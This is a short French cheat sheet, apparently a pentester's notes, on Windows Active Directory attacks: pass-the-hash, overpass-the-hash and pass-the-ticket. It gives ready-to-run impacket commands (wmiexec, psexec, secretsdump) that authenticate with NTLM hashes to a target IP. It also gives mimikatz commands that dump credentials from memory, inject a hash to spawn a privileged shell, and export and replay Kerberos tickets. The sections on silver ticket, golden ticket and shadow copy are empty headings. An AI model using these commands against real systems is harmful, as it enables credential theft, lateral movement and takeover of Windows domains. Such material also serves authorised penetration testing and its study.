Pass the *

Pass the hash

Cette technique permet à un utilisateur de s’authentifier à l’aide d’un hash utilisateur plutôt qu’avec le mot de passe en clair. Cela est possible grâce au mécanisme d’authentification NTLM, si celui-ci est désactivé au profit de Kerberos, l’attaque n’est plus possible.

Plusieurs outils permettent d’effectuer un PassTheHash (PTH), en voici quelques exemples présents dans la suite impacket

wmiexec.py -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73
psexec.py -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73
secretsdump.py -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73

Overpass the hash

Cette attaque peut être effectuée avec mimikatz:

privilege::debug
sekurlsa::logonpasswords
sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell

Le shell ainsi lancé a les droits permettant d’obtenir les droits de l’utilisateur jen.

Pass the ticket

privilege::debug
sekurlsa::tickets /export
kerberos::ptt <ticket_name>.kirbi

Il est ensuite possible de vérifier que le ticket est bien pris en compte à l’aide de la commande klist.

Silver ticket

Golden ticket

Shadow copy

Bibliographie :

• https://beta.hackndo.com/remote-lsass-dump-passwords/